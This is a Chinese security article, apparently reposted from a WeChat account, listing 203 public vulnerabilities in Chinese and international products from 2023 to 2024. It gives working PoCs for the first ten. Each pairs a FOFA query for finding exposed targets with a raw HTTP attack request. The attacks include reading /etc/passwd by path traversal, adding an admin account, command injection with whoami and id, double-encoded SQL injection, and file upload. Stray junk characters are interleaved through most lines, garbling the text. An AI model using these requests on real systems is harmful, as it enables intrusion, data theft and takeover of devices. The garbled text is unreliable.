互联网公开漏洞整理202309-2024065 X9 F$ z( W- ]& B4 {" `( w
道一安全 2024-06-05 07:41 北京
4 v$ b$ F) R7 ^4 |& \8 j& z以下文章来源于网络安全新视界 ,作者网络安全新视界/ U* n2 r8 k- ^6 j- ?. E
* H0 V8 h; M7 q: C发文目的:Nday漏洞的利用是安全攻防占比较大的攻击方式,希望文章对大家的防守提供一定帮助。防守同学可根据本文内容进行风险排查。1 Q0 k, x f& s5 A3 L& R- ^- M' _
' l2 y! k, d( S; Y3 g- d漏洞来源:文章涵盖2023年9月至2024年5月国内外公开的高危害漏洞POC共203个,均来自于互联网其他公众号或者网站,由网络安全新视界团队进行整理发布。
, v6 {% e; [1 \" ?1 C
9 _ @; t j# B8 v7 }$ E( W% [ Q安全补丁:所有的漏洞均为公开漏洞,补丁或漏洞修复方案请联系产品厂家。0 F! V" |& [2 O5 Q
! l1 X2 T7 ^$ [6 @# a2 ^/ _. b; ^
文章内容:因受篇幅限制,个别漏洞POC由于过长,统一使用PAYLOAD字样代替,如需完整POC请自行搜索。
9 m! }' D: b4 E: l( M5 Q
+ N. o) m6 h9 D合法权益:如文章内容侵犯某方合法权益,请后台联系网络安全新视界团队对相关内容进行删除。
' `) J, {2 I* B" F0 }7 ^0 x5 p$ B7 p' C1 D' U4 O4 Y- R
7 C: V6 v$ k$ B2 L4 s* I, M/ o声明
( C/ x+ y, V G& m) n" p# T! R" i, m' b5 v" J* ~! j9 E
为简化流程,方便大家翻阅,固不设置“回复再给完整列表”。本文章就是当前最全文章,使用时F12搜索关键词即可。
: ]: p( P8 u4 ~
+ z/ q0 U' |- T& O5 _有需要的可以收藏此文。也可以关注本公众号(网络安全新视界)。
9 P) D9 Q s* C/ S$ }& J9 }" l9 d8 T( l
c+ _+ e: G3 v$ P7 o, `
. H/ h7 `+ y& C5 S% E) n0 {
目录% h" A" {- i# ?
8 R# C( l2 v' U" {, f, F! Y
01
6 `( o1 T# s) L3 z, b7 u! P, p- N7 M1 I, Z
1. StarRocks MPP数据库未授权访问
9 x% j/ Q# }: F! V2. Casdoor系统static任意文件读取" r4 A8 K: I- `
3. EasyCVR智能边缘网关 userlist 信息泄漏
! x9 _5 y1 m4 n# z& O" ^$ B4. EasyCVR视频管理平台存在任意用户添加
7 ]& X u4 P; H% C2 t2 _* @0 d5. NUUO NVR 视频存储管理设备远程命令执行
6 o' {* c! {' y, [( [6. 深信服 NGAF 任意文件读取9 W9 A% i, p' {' K
7. 鸿运主动安全监控云平台任意文件下载
0 O7 A* ~# B/ |, r8 j* P( S8. 斐讯 Phicomm 路由器RCE
# a- l& Z# u; R, }, q& T8 O% y4 ?9. 稻壳CMS keyword 未授权SQL注入7 \* Z1 B) c. Z7 N% `- r7 h+ W
10. 蓝凌EIS智慧协同平台api.aspx任意文件上传( Y$ X* N' }8 W4 A" ]
11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
' H! E6 c" N8 T% w) B12. Jorani < 1.0.2 远程命令执行
* \: U+ ]) `, e5 H% U7 Y13. 红帆iOffice ioFileDown任意文件读取1 g% f& l* o9 ~, A3 l x
14. 华夏ERP(jshERP)敏感信息泄露3 D3 J- \+ ~% m" v; Q7 t3 n/ N
15. 华夏ERP getAllList信息泄露; B5 e3 Y3 ^: X
16. 红帆HFOffice医微云SQL注入0 H' s/ h8 i& l, |, x
17. 大华 DSS itcBulletin SQL 注入' g9 P" I1 u' q5 G) S) L
18. 大华 DSS 数字监控系统 user_edit.action 信息泄露
9 m0 u* X5 i# [5 J19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
7 O+ L' [3 D& A& Y" C6 W8 l+ L20. 大华ICC智能物联综合管理平台任意文件读取
2 \, B, |6 P& r( B p/ S# u21. 大华ICC智能物联综合管理平台random远程代码执行
3 e* O3 t' h& a6 _4 _; b3 ^22. 大华ICC智能物联综合管理平台 log4j远程代码执行& U$ W3 e: o% [- _3 i! T/ J( b
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行/ M( R# K8 a8 ?* C
24. 用友NC 6.5 accept.jsp任意文件上传" E" w2 r2 ^1 e/ ~6 F
25. 用友NC registerServlet JNDI 远程代码执行
* L. }+ J- E' C' u7 Y26. 用友NC linkVoucher SQL注入$ U5 J1 U% L. M# `$ \
27. 用友 NC showcontent SQL注入
6 ]: J# Q- } A! y+ |28. 用友NC grouptemplet 任意文件上传
$ l+ |, T" Y: y" Y& ~" ^+ \29. 用友NC down/bill SQL注入
4 C7 D* l+ s0 {2 @7 L7 s30. 用友NC importPml SQL注入
' B- f! R; _$ r. l31. 用友NC runStateServlet SQL注入
& T6 B- S2 [* |5 M, i: w- E32. 用友NC complainbilldetail SQL注入
/ f Q: N- r3 L2 h33. 用友NC downTax/download SQL注入
) h6 ^% e: y2 e q* V/ }5 P34. 用友NC warningDetailInfo接口SQL注入
; E4 l! L7 E! K35. 用友NC-Cloud importhttpscer任意文件上传' r8 N6 a! I% ^5 r% f/ k
36. 用友NC-Cloud soapFormat XXE
! a" I1 V/ W4 ]37. 用友NC-Cloud IUpdateService XXE, q8 k. a$ t# e E p7 i X* r
38. 用友U8 Cloud smartweb2.RPC.d XXE
' E, {! K; w' c8 S, t* f39. 用友U8 Cloud RegisterServlet SQL注入
/ l0 R6 K/ p+ f40. 用友U8-Cloud XChangeServlet XXE
; O' u/ r# Z# q# W: v1 p1 m41. 用友U8 Cloud MeasureQueryByToolAction SQL注入
7 L# s3 B# \" ^! v42. 用友GRP-U8 SmartUpload01 文件上传
4 j6 g- k) h/ x. Q! ?' ~; l43. 用友GRP-U8 userInfoWeb SQL注入致RCE
! D0 A1 O! D9 F8 f9 x' r44. 用友GRP-U8 bx_dj_check.jsp SQL注入( Y. G) F/ j* x' z* G; f' i- L
45. 用友GRP-U8 ufgovbank XXE
" V, N/ ?2 C# N9 Z7 M8 N- [+ H" [46. 用友GRP-U8 sqcxIndex.jsp SQL注入. ~$ S0 B; t3 b9 c1 V8 u
47. 用友GRP A++Cloud 政府财务云 任意文件读取
/ }1 Z( V6 H ]" x% S& M. P& P x48. 用友U8 CRM swfupload 任意文件上传9 \8 H& D( L* L: c- K
49. 用友U8 CRM系统uploadfile.php接口任意文件上传
# h/ C' R7 j7 H) B* m' j) D+ k50. QDocs Smart School 6.4.1 filterRecords SQL注入
/ J- _, W- V) o7 O- F51. 云时空社会化商业 ERP 系统 validateLoginName SQL 注入, t) ?$ @2 ^! a
52. 泛微E-Office json_common.php sql注入
% c2 ?* O* m }: L! @7 O' ^53. 迪普 DPTech VPN Service 任意文件上传
8 K" o( k# q' s5 p9 Y9 V! V V54. 畅捷通T+ getstorewarehousebystore 远程代码执行4 q+ G5 O* L/ y% m' v) t( H
55. 畅捷通T+ getdecallusers信息泄露" }3 g* m+ g: F: H) G" Z
56. 畅捷通T+ RRATableController,Ufida.T.DI.UIP.ashx 反序列化RCE
! b: d S6 M1 y% |. _57. 畅捷通T+ keyEdit.aspx SQL注入
3 J7 g& w p/ q, M( h& l3 v58. 畅捷通T+ KeyInfoList.aspx sql注入! f) k- ?$ I/ M( @. E+ i
59. XETUX 软件 dynamiccontent.properties.xhtml 远程代码执行3 c1 \' _; g7 k9 x1 }5 X
60. 百卓Smart管理平台 importexport.php SQL注入2 [/ K* `4 K) _5 \ i) i- r
61. 浙大恩特客户资源管理系统 fileupload 任意文件上传' ?, E% \9 |7 V+ e& Z9 |
62. IP-guard WebServer 远程命令执行
4 a4 V8 R5 K4 V. J& ?63. IP-guard WebServer任意文件读取
) F- D; L8 i' @1 V+ x* F64. 捷诚管理信息系统CWSFinanceCommon SQL注入
1 k) x2 N5 n9 e f65. 优卡特脸爱云一脸通智慧管理平台1.0.55.0.0.1权限绕过5 Z1 t' n% F; h3 }8 _ _
66. 万户ezOFFICE协同管理平台SendFileCheckTemplateEdit-SQL注入
4 k9 D; ], `9 H" H. }- N67. 万户ezOFFICE wpsservlet任意文件上传
$ |+ p6 r$ V) j& X+ _) ~68. 万户ezOFFICE wf_printnum.jsp SQL注入
% i. z: D* W1 l% w' r69. 万户 ezOFFICE contract_gd.jsp SQL注入+ c4 P4 G1 U4 s3 j6 N
70. 万户ezEIP success 命令执行& [# I% Z& X( r0 V" ^! S; X6 E
71. 邦永PM2项目管理系统 Global_UserLogin.aspx SQL注入" \ ^6 }( M; w* x( P2 n/ U5 \2 ~
72. 致远OA getAjaxDataServlet XXE9 M- ~$ ]( |" J e
73. GeoServer wms远程代码执行
/ I8 w% ^/ @1 J( o) Y7 g# ^ ~74. 致远M3-server 6_1sp1 反序列化RCE5 i! h% |' X" O6 U/ M7 ^( q% `
75. Telesquare TLR-2005Ksh 路由器 admin.cgi RCE
1 V) {9 l( e# M4 W" R7 Z. ?$ B- Z76. 新开普掌上校园服务管理平台service.action远程命令执行
3 J1 I$ z& M: V77. F22服装管理软件系统UploadHandler.ashx任意文件上传
9 m1 Q- H- h' a' c1 a8 O9 M6 t! \78. pkpmbs 建设工程质量监督系统 FileUpload.ashx 文件上传
8 V$ ]( t8 I" g$ Z/ ]$ ]79. BYTEVALUE 百为流控路由器远程命令执行
4 W$ H3 D7 O% _7 j) o7 i80. 速达天耀软件DesignReportSave.jsp接口存在任意文件上传
: Z$ a8 I- c7 b81. 宇视科技视频监控宇视(Uniview)main-cgi密码泄露
- u8 d+ X0 l0 E82. 思福迪LOGBASE运维安全管理系统 test_qrcode_b 远程命令执行
3 [5 F) }. n6 ^5 W( x- f1 q83. JeecgBoot testConnection 远程命令执行
- w k2 {$ ?/ R* e$ L6 s% X84. Jeecg-Boot JimuReport queryFieldBySql 模板注入4 Y) V8 O* A2 y3 y9 k- V/ G# F
85. SysAid On-premise< 23.3.36远程代码执行4 W0 o4 r0 t0 O% b( Y; b( [; e
86. 日本tosei自助洗衣机RCE
- \' Z/ g8 z8 h- x+ o& \3 z87. 安恒明御安全网关aaa_local_web_preview文件上传) A. m+ k: W2 J+ `
88. 安恒明御安全网关 aaa_portal_auth_config_reset 远程命令执行
" p% ~! H8 ]7 j, A1 i5 [89. 致远互联FE协作办公平台editflow_manager存在sql注入
* U# q, z$ Y( p! {90. 海康威视IP网络对讲广播系统3.0.3_20201113_RELEASE远程命令执行
( e5 ~1 m$ g- Z0 w U6 C) }2 V91. 海康威视综合安防管理平台orgManage/v1/orgs/download任意文件读取
# l V6 f1 {/ W6 [) K. G+ U92. 海康威视运行管理中心session命令执行3 W& z" A7 f% H& D, p
93. 奇安信网神SecGate3600防火墙app_av_import_save任意文件上传6 n0 C9 q7 {2 m3 A- A9 J; t
94. 奇安信网神SecGate3600防火墙obj_area_import_save任意文件上传/ C( h* P( F- F- w/ A# P
95. Apache-OFBiz < 18.12.10 xmlrpc远程代码执行7 K' {# w2 `3 a) H; E
96. Apache OFBiz 18.12.11 groovy 远程代码执行
" }: U3 P. D0 s97. OneBlog v2.2.2 博客Shiro反序列化远程命令执行
+ f+ f5 _4 [# {6 A: k98. SpiderFlow爬虫平台远程命令执行
# S( O9 g9 f# |% ?* @ e99. Ncast盈可视高清智能录播系统busiFacade RCE
" ]3 F9 ]9 E9 }# S7 Z3 P+ q100. Likeshop 2.5.7.20210311 File.php userFormImage 文件上传0 e' V4 G& e( ]$ T; z5 P
101. ivanti policy secure-22.6命令注入" d/ V6 U! X6 ]% f" T y. n4 x4 H
102. Ivanti Pulse Connect Secure VPN SSRF致远程代码执行
2 r, |( D$ L6 u, ^6 Z103. Ivanti Pulse Connect Secure VPN XXE
+ a: b4 k1 L& M9 T5 Z3 `& s. S2 @104. Totolink T8 设置 cstecgi.cgi getSysStatusCfg 信息泄露( r4 j9 U; I7 h" \- z- V
105. SpringBlade v3.2.0 export-user SQL 注入
6 _' t0 G6 i0 x8 o" z9 ^: P: t106. SpringBlade dict-biz/list SQL 注入
; a J. w) V' H2 ~107. SpringBlade tenant/list SQL 注入3 i! k( ~, l9 Q$ m
108. D-Tale 3.9.0 SSRF
; n- B5 `& Z3 D9 [; F109. Jenkins CLI 任意文件读取
u6 V1 l( Y( p, C( ]110. Goanywhere MFT 未授权创建管理员' U( v2 k9 b8 [* c+ J% s
111. WordPress Plugin HTML5 Video Player SQL注入
( u% q* ]' K& l3 b+ }+ g112. WordPress Plugin NotificationX SQL 注入
7 A) n$ [/ X! i& c113. WordPress Automatic 插件任意文件下载和SSRF
$ H4 o: @ Q# A( ?" E" A; Q114. WordPress MasterStudy LMS插件 SQL注入, C1 O3 G6 P8 b m
115. WordPress Bricks Builder <= 1.9.6 RCE
" O4 t" U4 l6 ?/ g116. wordpress js-support-ticket文件上传+ |) m; G- R* p$ X
117. WordPress LayerSlider插件SQL注入
' }3 J) k/ z+ u3 [. f3 V118. 北京百绰智能S210管理平台uploadfile.php任意文件上传
, x. D) P: u2 l. L6 e119. 北京百绰智能S20后台sysmanageajax.php sql注入: t/ _6 M0 u& i% V$ T
120. 北京百绰智能S40管理平台导入web.php任意文件上传
( n! S! Y |# _8 ?# G0 p121. 北京百绰智能S42管理平台userattestation.php任意文件上传
$ B9 x( R9 I& b' q; h, l1 v' F0 C122. 北京百绰智能s200管理平台/importexport.php sql注入
& M" H$ ? D9 N+ I: f123. Atlassian Confluence 模板注入代码执行. J0 ]& ~ z9 P* X+ D. u; I3 |
124. 湖南建研工程质量检测系统任意文件上传
- o% C2 Z. [' C K, L1 w- y125. ConnectWise ScreenConnect身份验证绕过% R2 R' Y; `" ?6 m2 B0 l
126. Aiohttp 路径遍历
0 R& T2 l0 A( h9 Z J, ^+ [7 s/ ?& C127. 广联达Linkworks DataExchange.ashx XXE- O" T& d* e- D; H* I& q* o( s9 D
128. Adobe ColdFusion 反序列化2 A0 p* }; w& C3 s1 p
129. Adobe ColdFusion 任意文件读取
7 ^3 O3 e% i0 K5 B! s: o, }1 ~130. Laykefu客服系统任意文件上传/ r8 F: ]8 |3 r( i% a3 j* e. j
131. Mini-Tmall <=20231017 SQL注入4 u7 E. S- }. z2 q- H
132. JetBrains TeamCity 2023.11.3 及以下版本存在身份验证绕过/ C, ?) y; d$ c! _+ b
133. H5 云商城 file.php 文件上传; D0 W- z# {2 {. B# z0 v2 Y
134. 网康NS-ASG应用安全网关index.php sql注入+ ^' P! G) k3 w0 H! i7 W2 u+ b
135. 网康NS-ASG应用安全网关list_ipAddressPolicy.php sql注入) [6 D: ~" N7 l) V3 l
136. NextChat cors SSRF
& f( S% ^" r/ D# b9 y. U137. 福建科立迅通信指挥调度平台down_file.php sql注入+ V- \. t+ c+ A9 m
138. 福建科立讯通信指挥调度平台pwd_update.php sql注入5 A6 w5 T# P7 d+ u3 Q
139. 福建科立讯通信指挥调度平台editemedia.php sql注入
1 P; @+ Q1 s) u# B140. 福建科立讯通信指挥调度平台get_extension_yl.php sql注入9 P ^0 z, r( K
141. 建科立讯通信指挥调度管理平台 ajax_users.php SQL注入
' Q4 W" l$ W* X2 a: A( ]4 t142. CMSV6车辆监控平台系统中存在弱密码, I C% O% L/ g; a
143. Netis WF2780 v2.1.40144 远程命令执行
; I- |& a8 C8 ~) W8 U: i/ s" z144. D-Link nas_sharing.cgi 命令注入
$ \% r' B6 L1 E( i145. Palo Alto Networks PAN-OS GlobalProtect 命令注入% U& [& D6 o3 }
146. MajorDoMo thumb.php 未授权远程代码执行
0 |/ ?/ Z( z8 k- ~0 Q0 h9 x5 f+ U147. RaidenMAILD邮件服务器v.4.9.4-路径遍历, [2 |7 K& n# q; l& O8 P
148. CrushFTP 认证绕过模板注入. }, k+ @* y% |; J
149. AJ-Report开源数据大屏存在远程命令执行' j! U; E v, S
150. AJ-Report 1.4.0 认证绕过与远程代码执行, [7 V9 I% e9 ~" n
151. AJ-Report 1.4.1 pageList sql注入7 C6 r. e' d+ l/ c
152. Progress Kemp LoadMaster 远程命令执行
4 }: ~. w& \) \* t1 x$ m+ ^153. gradio任意文件读取" _* e$ P! i. a' l
154. 天维尔消防救援作战调度平台 SQL注入$ w3 L3 d6 \# H$ Y' c) ~. {3 L6 J$ p% j
155. 六零导航页 file.php 任意文件上传8 y) _) C* V( U, F! J8 }
156. TBK DVR-4104/DVR-4216 操作系统命令注入: i) [: @& l, h2 }& j
157. 美特CRM upload.jsp 任意文件上传
! t( |6 X2 m1 ?8 S158. Mura-CMS-processAsyncObject存在SQL注入
. U6 d7 V" V, [# z7 F159. 英飞达医学影像存档与通信系统 WebJobUpload 任意文件上传5 l+ {0 c" K, w: A6 ]( }" ~; i
160. Sonatype Nexus Repository 3目录遍历与文件读取
0 Y! Q# ~! m7 i& [161. 科拓全智能停车收费系统 Webservice.asmx 任意文件上传8 a g1 K4 l5 R- V
162. 和丰多媒体信息发布系统 QH.aspx 任意文件上传8 }$ ?' x% k9 @' A
163. 号卡极团分销管理系统 ue_serve.php 任意文件上传/ M4 @' C$ Y: J/ U8 A- f7 @
164. 慧校园(安校易)管理系统 FileUpProductupdate.aspx 任意文件上传/ e7 I" [. F& l0 \( e3 k3 p
165. OrangeHRM 3.3.3 SQL 注入0 Z# h" p5 }7 K" O1 h6 d
166. 中成科信票务管理平台SeatMapHandler SQL注入+ @0 a$ i7 d. J. U" S7 U
167. 精益价值管理系统 DownLoad.aspx任意文件读取2 x7 u S% x* p% Y
168. 宏景EHR OutputCode 任意文件读取
2 z5 Y0 j1 v" @% Y1 T" w5 p5 |169. 宏景EHR downlawbase SQL注入+ n* S2 p4 o& L( j: k4 a" e
170. 宏景EHR DisplayExcelCustomReport 任意文件读取
$ Y) M5 S" {9 t% \171. 通天星CMSV6车载定位监控平台 SQL注入
+ m& l( E* i( K172. DT-高清车牌识别摄像机任意文件读取' ^' b* S: m# E# A4 J3 @& h2 [' |+ Y
173. Check Point 安全网关任意文件读取 w, i: {+ H6 {( |+ a$ S( H
174. 金和OA C6 FileDownLoad.aspx 任意文件读取9 d$ V, g& r2 ~8 i4 e, n& L( w7 c$ R
175. 金和OA C6 IncentivePlanFulfill.aspx SQL注入
4 [' c: m6 ?4 C4 c1 X& P& n8 K176. 电信网关配置管理系统 rewrite.php 文件上传
" E; p7 F9 ?8 e1 I177. H3C路由器敏感信息泄露8 R' r6 ^* v7 @
178. H3C校园网自助服务系统-flexfileupload-任意文件上传( H8 c' d8 _- N* Z; z" z
179. 建文工程管理系统存在任意文件读取
7 d& i& Y2 n# v/ t; X180. 帮管客 CRM jiliyu SQL注入
& l& F8 O; [) r7 m8 p181. 润申科技企业标准化管理系统 UpdataLogHandler.ashx SQL注入
; u. A. _) i" @3 k+ l6 ~8 y F3 k182. 润申科技企业标准化管理系统AddNewsHandler.ashx 任意用户创建
* k3 K3 l& i$ j1 E: t183. 广州图创图书馆集群管理系统 updOpuserPw SQL注入
1 R ~! {0 K; G184. 迅饶科技 X2Modbus 网关 AddUser 任意用户添加; x0 }- T* Y2 j; t9 E
185. 瑞友天翼应用虚拟化系统SQL注入
6 Y5 O+ o4 H6 w9 C/ c" e$ _( H1 z186. F-logic DataCube3 SQL注入. c8 T/ b5 J2 m3 C' h5 X
187. Mura CMS processAsyncObject SQL注入
$ i; e' ~0 j( F8 z4 u0 g188. 叁体-佳会视频会议 attachment 任意文件读取
X" w5 ]6 F4 f+ U0 o) Z5 U189. 蓝网科技临床浏览系统 deleteStudy SQL注入
2 H* ]1 a& O: c' j7 ?& g6 p, [190. 短视频矩阵营销系统 poihuoqu 任意文件读取4 F1 `- Z/ m# r8 b8 O7 |; F
191. 亿赛通电子文档安全管理系统 NavigationAjax SQL注入
' [2 t& }8 i+ g) Q! X192. 富通天下外贸ERP UploadEmailAttr 任意文件上传# M' A6 ^ u3 b
193. 山石网科云鉴安全管理系统 setsystemtimeaction 命令执行( K* T6 g0 j/ i
194. 飞企互联-FE企业运营管理平台 uploadAttachmentServlet 任意文件上传
% M- ?. W0 p( P+ l6 H# T195. 飞鱼星上网行为管理系统 send_order.cgi命令执行
; e& S/ M: r7 A3 N8 v196. 河南省风速科技统一认证平台密码重置& j/ ]9 [3 Q: r0 S/ ~2 _
197. 浙大恩特客户资源管理系统-Quotegask_editAction存在SQL注入1 [. H6 q+ J* u" k; Y+ [
198. 阿里云盘 WebDAV 命令注入! N( l' Q( Y8 x" d; P
199. cockpit系统assetsmanager_upload接口 文件上传5 h# w$ g3 ]( O: U( A
200. SeaCMS海洋影视管理系统dmku SQL注入, o' k$ W" V- h
201. 方正全媒体新闻采编系统 binary SQL注入( h l3 Z) I1 J. d$ @ ~+ P2 Q' I+ A, H* r
202. 微擎系统 AccountEdit任意文件上传' y- Q& B$ A# i! P+ }; r1 f7 W
203. 红海云EHR PtFjk 文件上传1 R8 j$ P. m- m) W, U! o
I# R1 E4 o! l) i' IPOC列表
6 o5 F3 W- Y) c J, b
8 t9 P- A; G) m6 c0 u02
0 p9 x6 R- Q, i( Y) m
S5 y( f; g1 ?2 a1 u2 m; j. z1 }1. StarRocks MPP数据库未授权访问
8 @# x9 y/ Q' \- GFOFA :title="StarRocks"8 k' G) @' Z7 J- u f% M' b1 C( g
GET /mem_tracker HTTP/1.18 _& B; }% Y4 g! o
Host: URL
, J: P+ g" Y8 D$ f* u
+ a7 H: t, i6 j1 A( f$ X) d! L1 `2 j. g+ n2 X2 A
2. Casdoor系统static任意文件读取
8 D l4 {, r$ R9 g4 @; jFOFA :title="Casdoor"
+ n+ @& e8 R2 z' DGET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
0 J- P% {" k" M' |! lHost: xx.xx.xx.xx:9999
9 R5 R( M& }7 c7 j( ]7 X/ TUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
" Q. @# r+ q$ o3 A& \Connection: close
5 s% r5 l& N0 m9 c1 ZAccept: */*/ K' Y" b3 u) h. g0 N1 H5 i0 ?/ V
Accept-Language: en
6 h3 q1 b6 m. IAccept-Encoding: gzip
$ h9 G5 u1 J! p+ ^8 e* x8 y; o) v1 E5 _7 ?# ^
, \! V; v' i) Y& s" ?( a' b' `. \
3. EasyCVR智能边缘网关 userlist 信息泄漏
: H' T* V6 M" ^0 ]0 M" VFOFA :title="EasyCVR"" ]- q1 N7 v1 L6 o4 H
GET /api/v1/userlist?pageindex=0&pagesize=10 HTTP/1.10 K- F1 `( J5 p6 Q
Host: xx.xx.xx.xx
/ E0 X* w; q6 R9 H+ Z# e0 ?! |; E. `
) t, N& H- u9 \8 r2 o9 Z" l) } S8 p
! t( X) E: R L4. EasyCVR视频管理平台存在任意用户添加# ?* H8 B7 w3 B5 M
FOFA :title="EasyCVR"' l/ q3 U: |# G( x X, R
1 F. T1 b- P0 Opassword更改为自己的密码md53 \& V+ c: g/ t0 m/ N, C! S6 c; C6 T
POST /api/v1/adduser HTTP/1.1
( q; C1 W9 {: `# @; a4 eHost: your-ip w" t# _/ t& t2 o( z2 W
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
! a9 A8 _" Z/ q7 e/ q3 g3 u* W, F8 E0 \$ x
name=admin888&username=admin888&password=0e7517141fb53f21ee439b355b5a1d0a&roleid=1+ h( ? l9 ^5 }
/ o6 A6 N: a, Q# L/ x, G
& V8 `! i7 d: H- B* m+ M) X0 i
5. NUUO NVR 视频存储管理设备远程命令执行$ c, Z5 [* b2 w7 X2 U
FOFA:title="Network Video Recorder Login"4 w3 P9 R. z9 n! ]' G
GET /__debugging_center_utils___.php?log=;whoami HTTP/1.1
2 l5 Y5 e) G B, o1 i* S$ l+ EHost: xx.xx.xx.xx# b$ c/ m' y& e5 C) M" `* e
. d* [' c, f2 |7 _: e7 c- B( B
' f+ }" c9 w- v6. 深信服 NGAF 任意文件读取& w. M! n$ o8 |3 V% p
FOFA:title="SANGFOR | NGAF"0 \5 a, a) T3 P$ Y2 i
GET /svpn_html/loadfile.php?file=/etc/./passwd HTTP/1.1& m. m- x$ Q' q# D2 \- P
Host:
4 O3 e0 x& V. [; r- d7 s4 _$ E- E, T6 @, J: P
q) q1 m' o! g1 W
7. 鸿运主动安全监控云平台任意文件下载$ N5 a0 l4 [% t; D
FOFA:body="./open/webApi.html" x r5 c7 E6 I4 q: Q
GET /808gps/MobileAction_downLoad.action?path=/WEB-INF/classes/config/jdbc.properties HTTP/1.1& H4 W: g* q" R8 r! ?( j
Host:; m G* q. D: g' h" _) Z% S
' G6 B! B# Z1 a% l. g
1 {& b- g* N4 @/ Q* B
8. 斐讯 Phicomm 路由器RCE
5 H! h* u" W' N% L' YFOFA:icon_hash="-1344736688"
% w; f% p3 W6 W' W0 e9 J( n8 K默认账号admin登录后台后,执行操作7 V; D4 s6 K9 j) J/ |$ b0 |2 `4 v
POST /cgi-bin/luci/;stok=bcd6ccd2fa5d212ce6431ca22f10b96d/admin/wifireboot HTTP/1.1: V; @) c: f! v& ]( F/ R( H
Host: x.x.x.x( `8 S9 l. C3 S: @$ R' {3 W
Cookie: sysauth=第一步登录获取的cookie- M4 }8 J7 [# L W8 S
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxbgjoytz- v- O; _8 D9 o% {8 P
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
* l* @0 C( P0 H `. D' T4 Y. ~* k1 o# _! k8 d3 }' }1 `8 I
------WebKitFormBoundaryxbgjoytz: \3 i' S7 h( m9 y6 f8 W& C- E
Content-Disposition: form-data; name="wifiRebootEnablestatus"# R0 M$ x; b4 X+ [3 z3 W( @3 k) E9 c
* B7 G& l+ o2 ~* X* G%s
* {, u9 c0 f1 w" j8 r------WebKitFormBoundaryxbgjoytz
" H, q! S! u; j) E" y9 {Content-Disposition: form-data; name="wifiRebootrange"
9 F8 I ]: R) R9 D
& ^, [) q |& a2 h% T" ~* y12:00; id;
. c9 m/ G% y0 C. h2 J( C% u. {. N% O9 M------WebKitFormBoundaryxbgjoytz
& _5 o; C8 \8 H5 X7 \8 k' fContent-Disposition: form-data; name="wifiRebootendrange"
8 ]% Q, M9 H6 L* O4 {' e* {4 f( h) G4 D# }9 Z7 s+ L( N) ]
%s:& Q6 Q1 u2 K* W! k/ G
------WebKitFormBoundaryxbgjoytz' Q; k* G: }3 `
Content-Disposition: form-data; name="cururl2"
, w7 B8 ]6 o# R: d7 z) W+ v. b+ o& s
& w' j: W$ o/ e; `6 l3 U2 b u------WebKitFormBoundaryxbgjoytz--
: M8 Y) h% D; F9 a; [3 s/ |+ l7 N2 V- A) u$ s0 I
) C" M S4 x% ]9. 稻壳CMS keyword 未授权SQL注入
; m5 J4 q) m4 }! m1 XFOFA:app="Doccms", s$ C9 r1 i# r+ D8 T3 l
GET /search/index.php?keyword=1%25%32%37%25%32%30%25%36%31%25%36%65%25%36%34%25%32%30%25%32%38%25%36%35%25%37%38%25%37%34%25%37%32%25%36%31%25%36%33%25%37%34%25%37%36%25%36%31%25%36%63%25%37%35%25%36%35%25%32%38%25%33%31%25%32%63%25%36%33%25%36%66%25%36%65%25%36%33%25%36%31%25%37%34%25%32%38%25%33%30%25%37%38%25%33%37%25%36%35%25%32%63%25%32%38%25%37%33%25%36%35%25%36%63%25%36%35%25%36%33%25%37%34%25%32%30%25%37%35%25%37%33%25%36%35%25%37%32%25%32%38%25%32%39%25%32%39%25%32%63%25%33%30%25%37%38%25%33%37%25%36%35%25%32%39%25%32%39%25%32%39%25%32%33 HTTP/1.1& G4 Y' W3 ~$ {) t
Host: x.x.x.x/ J; P" I1 a9 d& z. q
* e/ H4 u% V2 h+ \; t9 {% k; F
* ?- U( h: I2 @ @) N% v9 xpayload为下列语句的二次Url编码
4 l( ]( B% A: z5 Y5 T- k0 Q* K
q, Y( x+ A" K; W) k4 }$ B- R' and (extractvalue(1,concat(0x7e,(select user()),0x7e)))#
+ u t0 `, y5 c8 l( _# D, L1 Q& [
. F% _0 ^5 w, x, G% E: ?3 O, o10. 蓝凌EIS智慧协同平台api.aspx任意文件上传: k4 m$ s' ?4 A0 }7 a, r* u9 h
FOFA:icon_hash="953405444"1 u( T) j* l2 o! M
6 }- k1 |: {2 A8 ^文件上传后响应中包含上传文件的路径
: w, J d! M/ q1 o! {POST /eis/service/api.aspx?action=saveImg HTTP/1.1
! Z& D# _3 F6 y" IHost: x.x.x.x:xx
! L7 `/ ~( D! ~; X. fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36; A0 P1 ]6 c& o7 I9 h2 o
Content-Length: 197
7 i& b; ]% |+ }9 e: Z& g2 X+ [Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
" e" e8 @3 e$ yAccept-Encoding: gzip, deflate T8 L3 q* B' M/ k2 F# [9 Z2 A
Accept-Language: zh-CN,zh;q=0.94 S+ F) ^$ I7 @. a3 g7 Q( B( Q
Connection: close
5 r) r. q9 ~6 B: W' x) LContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryxdgaqmqu) x. }3 j& h1 s/ ?( q
3 N! G0 x2 W: t$ S0 |
------WebKitFormBoundaryxdgaqmqu- B; p3 X) d6 I% Q x# B/ K' |( I
Content-Disposition: form-data; name="file"filename="icfitnya.txt"- p6 @& e5 v. L J$ Y: R; z' }
Content-Type: text/html
% F; v' i* Z/ @0 G# d1 j- Z9 S. ]& ]8 h3 C" F
jmnqjfdsupxgfidopeixbgsxbf
: V; Q Q5 E$ b Y3 \. c+ m------WebKitFormBoundaryxdgaqmqu--
# z4 A/ [6 B% L' @# M, h
' k! L8 n4 P6 e& @' G: M4 E9 X9 y+ [# P) I8 A
